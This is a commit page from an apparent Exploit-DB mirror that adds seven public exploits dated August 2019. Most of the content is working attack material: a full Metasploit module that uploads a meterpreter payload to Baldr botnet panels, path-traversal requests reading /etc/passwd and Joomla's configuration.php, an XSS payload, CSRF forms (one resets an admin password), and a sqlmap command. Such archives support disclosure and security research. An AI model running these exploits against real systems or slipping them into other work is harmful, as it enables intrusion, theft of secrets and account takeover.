bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2019-08-09

Browse source 
7 changes to exploits/shellcodes

Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)
Aptana Jaxer 1.0.3.4547 - Local File inclusion
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download
Adive Framework 2.0.7 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
This commit is contained in:
Offensive Security 2019-08-09 05:02:23 +00:00
parent 44a9c2cd04
commit d82ffc9cd0
8 changed files with 425 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
exploits/multiple/webapps/47214.txt Normal file
View file

@ -0,0 +1,14 @@
# Exploit Title: Aptana Jaxer Remote Local File inclusion
# Date: 8/8/2019
# Exploit Author: Steph Jensen
# Vendor Homepage:
[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
# Version: 1.0.3.4547
# Tested on: Linux
# CVE : CVE-2019-14312
Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.
To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.
PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

242
exploits/php/remote/47215.rb Executable file
View file

@ -0,0 +1,242 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/http'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Baldr Botnet Panel Shell Upload Exploit",
'Description' => %q{
This module exploits the file upload vulnerability of baldr malware panel.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
],
'References' =>
[
['URL', 'https://prodaft.com']
],
'DefaultOptions' =>
{
'SSL' => false,
'WfsDelay' => 5,
},
'Platform' => ['php'],
'Arch' => [ ARCH_PHP],
'Targets' =>
[
['Auto',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
],
['Baldr <= v2.0',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
],
['Baldr v2.2',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
],
['Baldr v3.0 & v3.1',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
]
],
'Privileged' => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
]
)
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php")
)
ver = ''
if res.code == 200
if res.body.include?('~;~')
targets[3] = targets[0]
#target = targets[3]
ver = '>= v3.0'
elsif res.body.include?(';')
#target = targets[2]
targets[2] = targets[0]
ver = 'v2.2'
elsif res.body.size < 4
targets[1] = targets[0]
#target = targets[1]
ver = '<= v2.0'
else
Exploit::CheckCode::Safe
end
print_status("Baldr verison: #{ver}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
name = '.'+Rex::Text.rand_text_alpha(4)
files =
[
{data: payload.encoded, fname: "#{name}.php"}
]
zip = Msf::Util::EXE.to_zip(files)
hwid = Rex::Text.rand_text_alpha(8).upcase
if targets[0]
check
end
case target
when targets[3]
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php")}
)
key = res.body.to_s.split('~;~')[0]
print_good("Key: #{key}")
data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
data = xor(data,key)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php"),
'data' => data.to_s
}
)
if res.code == 200
print_good("Bot successfully registered.")
else
print_error("New bot register failed !")
return false
end
data = xor(zip.to_s,key)
form = Rex::MIME::Message.new
form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,"/gate.php"),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)
if res && (res.code == 200 ||res.code == 100)
print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
else
print_error("Server responded with code #{res.code}") if res
print_error("Failed to upload payload.")
return false
end
when targets[2]
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php")}
)
key = res.body.to_s.split(';')[0]
print_good("Key: #{key}")
data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
data << zip.to_s
result = ""
codepoints = data.each_codepoint.to_a
codepoints.each_index do |i|
result += (codepoints[i] ^ key[i % key.size].ord).chr
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,"/gate.php"),
'data' => result.to_s
)
if res && (res.code == 200 ||res.code == 100)
print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
else
print_error("Server responded with code #{res.code}") if res
print_error("Failed to upload payload.")
return false
end
else
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,"/gate.php"),
'data' => zip.to_s,
'encode_params' => true,
'vars_get' => {
'hwid' => hwid,
'os' => 'Windows 7 x64',
'cookie' => '0',
'pswd' => '0',
'credit' => '0',
'wallet' => '0',
'file' => '1',
'autofill' => '0',
'version' => 'v2.0'
}
)
if res && (res.code == 200 ||res.code == 100)
print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
else
print_error("Server responded with code #{res.code}") if res
print_error("Failed to upload payload.")
return false
end
end
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3
)
print_good("Payload successfully triggered !")
end
def xor(data, key)
result = ""
codepoints = data.each_codepoint.to_a
codepoints.each_index do |i|
result += (codepoints[i] ^ key[i % key.size].ord).chr
end
return result
end
end

16
exploits/php/webapps/47212.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]
Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

18
exploits/php/webapps/47213.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS
# PoC:
<html>
<body>
<form action="http://server/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>

51
exploits/php/webapps/47216.txt Normal file
View file

@ -0,0 +1,51 @@
#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: http://joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 1411 in file admin/models/ticket.php
1382 function getDownloadAttachmentByName($file_name,$id){
1383 if(empty($file_name)) return false;
1384 if(!is_numeric($id)) return false;
1385 $db = JFactory::getDbo();
1386 $filename = str_replace(' ', '_',$file_name);
1387 $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
1388 $db->setQuery($query);
1389 $foldername = $db->loadResult();
1390
1391 $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
1392 $base = JPATH_BASE;
1393 if(JFactory::getApplication()->isAdmin()){
1394 $base = substr($base, 0, strlen($base) - 14); //remove administrator
1395 }
1396 $path = $base.'/'.$datadirectory;
1397 $path = $path . '/attachmentdata';
1398 $path = $path . '/ticket/' . $foldername;
1399 $file = $path . '/' . $filename;
1400
1401 header('Content-Description: File Transfer');
1402 header('Content-Type: application/octet-stream');
1403 header('Content-Disposition: attachment; filename=' . basename($file));
1404 header('Content-Transfer-Encoding: binary');
1405 header('Expires: 0');
1406 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
1407 header('Pragma: public');
1408 header('Content-Length: ' . filesize($file));
1409 //ob_clean();
1410 flush();
1411 readfile($file); //!!!
1412 exit();
1413 exit;
1414 }
#####################################
#PoC:
#####################################
$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"

33
exploits/php/webapps/47217.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Adive Framework 2.0.7 Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346
# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.
# 2. Proof Of Concept (CODE):
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/adive/admin/config" method="POST">
<input type="hidden" name="userName" value="admin" />
<input type="hidden" name="confPermissions" value="1" />
<input type="hidden" name="pass" value="1234" />
<input type="hidden" name="cpass" value="1234" />
<input type="hidden" name="invokeType" value="web" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q

44
exploits/php/webapps/47218.txt Normal file
View file

@ -0,0 +1,44 @@
#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 441 in file admin/models/userfields.php
439 function dataForDepandantField( $val , $childfield){
440 $db = $this->getDBO();
441 $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
442 $db->setQuery($query);
443 $data = $db->loadObject();
444 $decoded_data = json_decode($data->userfieldparams);
445 $comboOptions = array();
446 $flag = 0;
447 foreach ($decoded_data as $key => $value) {
448 if($key == $val){
449 for ($i=0; $i < count($value) ; $i++) {
450 if($flag == 0){
451 $comboOptions[] = array('value' => '', 'text' => JText::_('Select').' '.$data->fieldtitle);
452 }
453 $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]);
454 $flag = 1;
455 }
456 }
457 }
458 $jsFunction = '';
459 if ($data->depandant_field != null) {
460 $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
461 }
462 $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
463 return $html;
464 }
#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql

7
files_exploits.csv
View file

@ -17594,6 +17594,7 @@ id,file,description,date,author,type,platform,port
47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41579,3 +41580,9 @@ id,file,description,date,author,type,platform,port
47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80
47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80
47212,exploits/php/webapps/47212.txt,"Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting",2019-08-08,Greg.Priest,webapps,php,80
47213,exploits/php/webapps/47213.txt,"Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)",2019-08-08,"Mr Winst0n",webapps,php,80
47214,exploits/multiple/webapps/47214.txt,"Aptana Jaxer 1.0.3.4547 - Local File inclusion",2019-08-08,"Steph Jensen",webapps,multiple,
47216,exploits/php/webapps/47216.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download",2019-08-08,qw3rTyTy,webapps,php,80
47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80
47218,exploits/php/webapps/47218.txt,"Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection",2019-08-08,qw3rTyTy,webapps,php,80

Can't render this file because it is too large.